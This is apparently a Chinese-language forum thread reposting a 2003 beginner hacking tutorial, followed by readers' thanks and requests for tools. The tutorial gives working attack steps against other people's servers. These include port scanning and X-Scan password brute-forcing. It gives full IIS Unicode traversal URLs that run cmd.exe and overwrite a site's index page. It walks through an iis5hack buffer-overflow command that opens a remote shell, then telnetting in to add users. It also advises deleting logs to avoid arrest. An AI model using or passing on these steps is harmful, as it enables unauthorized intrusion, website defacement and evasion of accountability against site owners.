初級Hacker速成班

tinjoe

有來學習的成員請多多留言 ... thanks

文件名稱：初級駭客教學 第一集 by Roy
文件作者：Roy
登錄時間：2003-01-08 13:16:15 - BY [roychiang]
--------------------------------------------------------------------------------
COPYRIGHT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Roy Chiang
https://www.dandyhardware.com/vbb/home.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. 掃窗口(port)
port是一個很重要的東西,如果你知道他所有有開的port的話,那你就可以從某個port開始hacking.
22 SSH 爽拉
21 FTP重要哦
23 TELNET賺到拉
25 STMP沒啥用ㄋㄟ
53 DOMAIN... 不想說了
80HTTP看網頁用的拉
110POP收信的(要破E-MAIL嗎?)
139 NETBOIS暴重要的!!!
3389win2000超級終端,最爽的一個
2. 破密碼(password)
大部分的密碼檔不是很好,不過有些很好<== 檔案超大的,不過勉強可用,<== 可以自己加歐!

3. 萬國碼(UNICODE)
雖然很老了,不過還是有很多主機都有UNICODE的BUG. 像是韓國的,一堆, 大陸的呢? 少之又少,因為怕被HACK,所以都有補

4. 烘培雞(FRONTPAGE)
很多人都以為說裝的FRONTPAGE EXTEND,可以讓網頁變好,但是像很多HACKER,可以直接用FRONTPAGE直接改網頁.
講了那麼多,終於要開始來玩了<== 爽爽爽
首先要先挑一隻肥肥嫩嫩的來玩,就先玩 https://www.newhacker.com/ 吧(隨便舉例)
要先找到他的IP歐,所以呢,請到CMD來PING它吧
C:>ping www.newhacker.com
Pinging www.newhacker.com [255.255.255.255] with 32 bytes of data:
Reply from 255.255.255.255: bytes=32 time=183ms TTL=238 …
阿他的IP不小心的被我PING出來了ㄟ
先掃掃看他的PORT 22 SSH,21 FTP,25 TELNET,53 DOMAIN,80 HTTP,110 POP,139 NETBOIS,3389 WIN2000 終端機 … 真多PORT阿
改首頁
請先拿出 X-SCAN 2.2 哈哈哈,他要死了,來掃unicode.
範例: https://www.newhacker.com/scripts/..%c1%1c../winnt/system32/_cmd_.exe?/
c+dir 哇,他的硬碟的東西都秀出來了歐. 來改他的主頁,那先找到他的路徑吧,請 dir 所有的資料夾來找吧,哈,他的路徑是c:inetpubwwwrootindex.html
https://www.newhacker.com/scripts/..%c1%1c../winnt/system32/cmd”.exe?/c+echo+hackedbytaiwan+>c:inetpubwwwrootindex.html
cgi錯誤, 不用裡他,現在到首頁去看看.爽爽爽,我的名稱被貼上去了,哈哈哈.
還有,要記的刪除紀錄歐,不然被抓我可不管歐.

IIS 溢出
據說緩衝區溢出攻擊是黑客入侵時70%所選的方法，看起來有點誇張，但確實有道理，因為暴力密碼破解在網絡上變得非常之慢，而像unicode的解碼漏洞所取得的權限又太低，而緩衝區溢出一般可取得system權限，是非常有用的！

具體原理我也不是很清楚，只能說個大概：當我們向系統發出超出緩衝區大小的數據處理請求時，便會引發溢出，並彈出錯誤對話框，我們常看到的「非法操作」其實也是可能是由於溢出。而當溢出時，eip發生錯誤，有彙編知識的朋友應該記得，eip是控制執行代碼的位置（順便問一下，有沒有會crack的高人，記得做我老師）這時加入一段惡性代碼，算好發生溢出時的eip值，這樣溢出時就會執行惡性代碼而不是當掉。非法操作我們知道多的不得了，因此……溢出攻擊是非常強大的！

由於彙編對於我們來說較難掌握，加之對溢出的瞭解很有限，那麼我們只能借助高手們的程序來黑了。

具體方法：

1，準備iishack，不要跟我要，該版本可以對多種系統進行攻擊。

2，用x-scan或流光掃瞄一個有iis.printer漏洞的主機，然後就可以攻擊了。

3，在命令行方式執行iis5hack (主機ip) (端口號，默認80）（系統代號，具體可參考程序的說明） （ shell口）

例如：iis5hack 255.255.255.255 80 1 111(以為在111端口開一個shell)

4,用telnet連上，telnet 255.255.255.255 111,成的話就可以控制機器了，加個用戶，做個代理……

密碼暴力破解
最好用的就是X-SCAN了,速度快,不過就是密碼檔太濫了,有空的話可以自己加
設定一番，上路吧！你可以睡覺，可以去machine(就是做作業)，可以去讀書……就是不要傻等。為什麼呢？因為會傷視力的：）

耍白吃

好像不錯
不過我沒那麼利害
只好先找朋友的電腦來試試看

ttjohnny

看起來大大您真的很強喔...^^

sunson

方法是不錯，不過我好像掃不到這樣的網站哦

blueasia

謝謝大大分享，不過這樣可能要讓很多工程師傷腦筋了^^

yrmfj

不錯的文章哦..
謝謝大大的教學...

cheetah

thanks!!!

USS277

誰可以給我iishack  和 x-scan的軟體或打上下載網址

子樵

很神的樣子ㄟ!!真想學學ㄟ!!感恩啦!!

shan37

不過我沒那麼利害
只好先找朋友的電腦來試試看

mitewold

好像很好玩耶～
不過都沒有軟體下載位址....只能乾瞪眼～
還是～謝謝～

無敵鐵金剛

好利害喔!大大一定有研究!真佩服大大阿!不過好像很難ㄟ!

woawoa

缺流光....可以提供一下嗎?